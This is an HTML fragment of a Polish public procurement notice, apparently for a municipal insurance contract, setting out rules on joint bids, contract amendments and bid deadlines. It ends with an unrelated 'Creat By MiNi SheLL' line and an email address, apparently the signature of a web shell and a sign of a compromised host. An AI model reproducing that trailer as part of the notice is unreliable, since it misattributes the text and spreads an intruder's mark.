Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Zgodnie z art. 58 ust. 1 u.p.z.p. wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>1. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, wykonawcy<br/>ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia<br/>albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>2. Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia.<br/>3. Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub<br/>zawodowej, o którym mowa w art. 112 ust. 2 pkt 2 u.p.z.p. jest spełniony, jeżeli co najmniej<br/>jeden<br/>z wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do<br/>prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje usługi,<br/>do których realizacji te uprawnienia są wymagane.<br/>4. W przypadku wyboru oferty wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii<br/>umowy regulującej współpracę tych wykonawców.<br/>4. Zgodnie z art. 118 ust. 1 u.p.z.p., wykonawca może w celu potwierdzenia spełniania<br/>warunków udziału w postępowaniu, polegać na zdolnościach technicznych lub zawodowych lub<br/>sytuacji finansowej lub ekonomicznej podmiotów udostępniających zasoby, niezależnie od<br/>charakteru prawnego łączących go z nimi stosunków prawnych. Z uwagi jednak na nieokreślenie<br/>przez zamawiającego warunków udziału w postępowaniu, dotyczących sytuacji ekonomicznej<br/>lub finansowej oraz zdolności technicznych lub zawodowych, przepis art. 118 u.p.z.p. nie ma w<br/>niniejszym postępowaniu zastosowania. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z pzp oraz projektami umów Zmiana umowy<br/>§11<br/>1. Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w sprawie<br/>zamówienia publicznego w stosunku do treści oferty, na podstawie której dokonano wyboru<br/>Wykonawcy, w przypadku: 1.1. zmiany o charakterze prawnym, tj.:<br/>1) zmiany powszechnie obowiązujących przepisów prawa, w szczególności Kodeksu cywilnego<br/>oraz przepisów o działalności ubezpieczeniowej, które będą miały wpływ na kształt warunków<br/>stanowiących podstawę udzielanej ochrony ubezpieczeniowej - w zakresie, w jakim zmiany<br/>te dotyczyć będą niniejszej umowy lub wynikających z niej umów ubezpieczenia,<br/>2) zmiany przepisów o zamówieniach publicznych, jeśli Zamawiający będzie zobowiązany<br/>uwzględnić je w umowie zawartej przed taką zmianą,<br/>3) zmiany przepisów prawa międzynarodowego, które zobowiązana będzie wdrożyć<br/>Rzeczpospolita Polska, w tym organy jej administracji samorządowej,<br/>4) wydanie decyzji, uchwał, postanowień, rozstrzygnięć, orzeczeń, wyroków itp. przez<br/>uprawnione organy, które będą zobowiązywały Zamawiającego do zmiany zawartej umowy lub<br/>wynikających<br/>z niej umów ubezpieczenia,<br/>5) inne zmiany o charakterze prawnym, jeśli powstanie obowiązek ich wdrożenia, w zakresie w<br/>jakim zmiany te dotyczyć będą niniejszej umowy lub wynikających z niej umów ubezpieczenia;<br/>1.2. zmiany podmiotowego zakresu zamówienia, tj.:<br/>1) utworzenia przez Zamawiającego nowych podmiotów, w tym wyodrębnionych z podmiotów<br/>dotychczas objętych zamówieniem lub powstałych w wyniku ich połączenia,<br/>2) restrukturyzacji, przekształcenia, połączenia, podziału, komercjalizacji lub zmiany formy<br/>prawnej podmiotów objętych zamówieniem,<br/>3) rozwiązania podmiotu objętego zamówieniem;<br/>1.2.1. w przypadku zmiany formy prawnej podmiotów objętych zamówieniem, szczególnie w<br/>związku<br/>z ich przekształceniem w spółkę prawa handlowego, nowopowstały podmiot lub upoważniony<br/>przez niego Zamawiający winien wyrazić pisemnie wolę kontynuacji umów ubezpieczenia w<br/>ciągu 30 dni, a Wykonawca wyrazi zgodę na przeniesienie praw z umów na nowy podmiot,<br/>pod warunkiem, że nowy podmiot będzie posiadał analogiczny profil działalności, jak przed<br/>zmianą i nie ulegną zmianie zabezpieczenia przeciwpożarowe i przeciwkradzieżowe; w<br/>przypadku braku pisemnego potwierdzenia woli kontynuacji ubezpieczeń uważa się, że umowa<br/>ubezpieczenia wygasła z dniem zmiany formy prawnej, a Wykonawca dokona zwrotu składki za<br/>niewykorzystany okres ubezpieczenia zgodnie z przepisami Kodeksu cywilnego i zasadami<br/>rozliczenia określonymi w niniejszej umowie;<br/>1.3. zmiany przedmiotowego zakresu zamówienia, tj.:<br/>1) wzrostu albo spadku ilości lub wartości przedmiotu ubezpieczenia ubezpieczonego systemem<br/>sum stałych (wzrostu albo spadku sumy ubezpieczenia),<br/>2) zwiększenia sumy ubezpieczenia w związku z modernizacją przedmiotu ubezpieczenia,<br/>przeprowadzonymi inwestycjami, adaptacją, rozbudową itp.,<br/>3) zmiany wysokości sum ubezpieczenia, w tym wynikającej ze zobowiązań Zamawiającego<br/>zaciągniętych po zawarciu umowy,<br/>4) zmiany wysokości sum gwarancyjnych, w tym wynikającej ze zobowiązań Zamawiającego<br/>zaciągniętych po zawarciu umowy,<br/>5) zmiany wykonywanej działalności i konieczności objęcia zmiany tej ochroną<br/>ubezpieczeniową,<br/>6) rozszerzenia zakresu ubezpieczenia w przypadku ujawnienia się bądź powstania nowego<br/>ryzyka ubezpieczeniowego, nieprzewidzianego lub pominiętego w specyfikacji warunków<br/>zamówienia<br/>i konieczności zawarcia nowego rodzaju ubezpieczenia,<br/>7) modyfikacji zakresu ochrony ubezpieczeniowej, w tym w związku ze zobowiązaniami<br/>Zamawiającego zaciągniętymi po zawarciu umowy,<br/>8) wyczerpania sumy ubezpieczenia w ubezpieczeniu systemem pierwszego ryzyka lub limitów<br/>odszkodowawczych w klauzulach i innych warunkach umowy ubezpieczenia oraz wyczerpania<br/>sumy gwarancyjnej bądź podlimitów odszkodowawczych w ubezpieczeniu odpowiedzialności<br/>cywilnej i konieczności ich uzupełnienia; <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-01 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem platformy zakupowej https://gminabilgoraj.ezamawiajacy.pl w sposób określony w SWZ</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-01 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-12-30</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> kontynuacja sekcji VII<br/>1.4. zmiany wynagrodzenia należnego Wykonawcy, jeśli zmiany opisane w pkt. 1.1-1.3 będą<br/>miały wpływ na wysokość tego wynagrodzenia:<br/>1) proporcjonalne zwiększenie wynagrodzenia Wykonawcy, z uwzględnieniem postanowień<br/>klauzuli automatycznego pokrycia lub zwrot przez Wykonawcę składki za niewykorzystany okres<br/>ubezpieczenia, zgodnie z zasadami rozliczenia określonymi w niniejszej umowie - w odniesieniu<br/>do zmian związanych ze wzrostem lub spadkiem sumy ubezpieczenia,<br/>2) odpowiednie zwiększenie lub zmniejszenie wynagrodzenia Wykonawcy w pozostałych<br/>przypadkach, w szczególności odnoszących się do uzupełnienia sum ubezpieczenia lub<br/>gwarancyjnych,<br/>lub limitów odszkodowawczych oraz do zwiększenia lub zmniejszenia wielkości ryzyka;<br/>1.5. wartość zmiany wynagrodzenia Wykonawcy musi być ekwiwalentna do jego świadczenia<br/>względem Zamawiającego;<br/>1.6. zwiększenie wynagrodzenia należnego Wykonawcy w przypadkach określonych w pkt. 1.1-<br/>1.4 nie nastąpi, jeśli Wykonawca zrezygnuje ze wzrostu tego wynagrodzenia.<br/>2. Zgodnie z art. 455 ust. 1 ustawy Prawo zamówień publicznych dopuszczalna jest zmiana<br/>umowy bez przeprowadzania nowego postępowania o udzielenie zamówienia:<br/>2.1. gdy nowy Wykonawca ma zastąpić dotychczasowego Wykonawcę:<br/>1) w wyniku sukcesji, wstępując w prawa i obowiązki Wykonawcy, w następstwie przejęcia,<br/>połączenia, podziału, przekształcenia, upadłości, restrukturyzacji, dziedziczenia lub nabycia<br/>dotychczasowego Wykonawcy lub jego przedsiębiorstwa, o ile nowy Wykonawca spełnia<br/>warunki udziału w postępowaniu, nie zachodzą wobec niego podstawy wykluczenia oraz nie<br/>pociąga to za sobą innych istotnych zmian umowy, a także nie ma na celu uniknięcia<br/>stosowania przepisów ustawy, lub<br/>2) w wyniku przejęcia przez Zamawiającego zobowiązań Wykonawcy względem jego<br/>podwykonawców, w przypadku, o którym mowa w art. 465 ust. 1 ustawy Prawo zamówień<br/>publicznych;<br/>2.2. jeżeli dotyczy realizacji, przez dotychczasowego Wykonawcę, dodatkowych usług, o ile stały<br/>się one niezbędne i zostały spełnione łącznie następujące warunki:<br/>1) zmiana Wykonawcy nie może zostać dokonana z powodów ekonomicznych lub technicznych,<br/>w szczególności dotyczących zamienności lub interoperacyjności usług zamówionych w ramach<br/>zamówienia podstawowego,<br/>2) zmiana Wykonawcy spowodowałaby istotną niedogodność lub znaczne zwiększenie kosztów<br/>dla Zamawiającego,<br/>3) wzrost ceny spowodowany każdą kolejną zmianą nie przekracza 50% wartości pierwotnej<br/>umowy, z wyjątkiem należycie uzasadnionych przypadków;<br/>2.3. jeżeli konieczność zmiany umowy spowodowana jest okolicznościami, których<br/>Zamawiający, działając z należytą starannością, nie mógł przewidzieć, o ile zmiana nie<br/>modyfikuje ogólnego charakteru umowy, a wzrost ceny spowodowany każdą kolejną zmianą nie przekracza 50% wartości pierwotnej umowy.<br/>3. Zgodnie z art. 455 ust. 2 ustawy Prawo zamówień publicznych, dopuszczalne są również<br/>zmiany umowy bez przeprowadzenia nowego postępowania o udzielenie zamówienia, których<br/>łączna wartość jest mniejsza niż progi unijne oraz jest niższa niż 10% wartości pierwotnej<br/>umowy,<br/>w przypadku zamówień na usługi, a zmiany te nie powodują zmiany ogólnego charakteru<br/>umowy.<br/>4. Warunkiem dokonania zmian, o których mowa w ust. 1-3 powyżej jest złożenie pisemnego<br/>wniosku przez Stronę inicjującą zmianę i jego akceptacja – w odniesieniu do zmian opisanych w<br/>pkt. 1.3 4-8<br/>- przez drugą Stronę, wraz ze sporządzeniem pisemnego aneksu do umowy (z zastrzeżeniem<br/>postanowień zawartych w pkt. 1.2.1 oraz z uwzględnieniem obligatoryjnych warunków<br/>ubezpieczenia i przyjętych fakultatywnych postanowień dodatkowych).<br/>5. Zmiana postanowień umowy może nastąpić w formie polisy lub innego dokumentu<br/>ubezpieczeniowego albo pisemnego aneksu pod rygorem nieważności.<br/>6. Istotna zmiana umowy, o której mowa w art. 454 ustawy Prawo zamówień publicznych,<br/>wymaga przeprowadzenia nowego postępowania o udzielenie zamówienia. Możliwe zmiany<br/>określone<br/>w niniejszej umowie nie mają charakteru zmian istotnych.

Creat By MiNi SheLL
Email: jattceo@gmail.com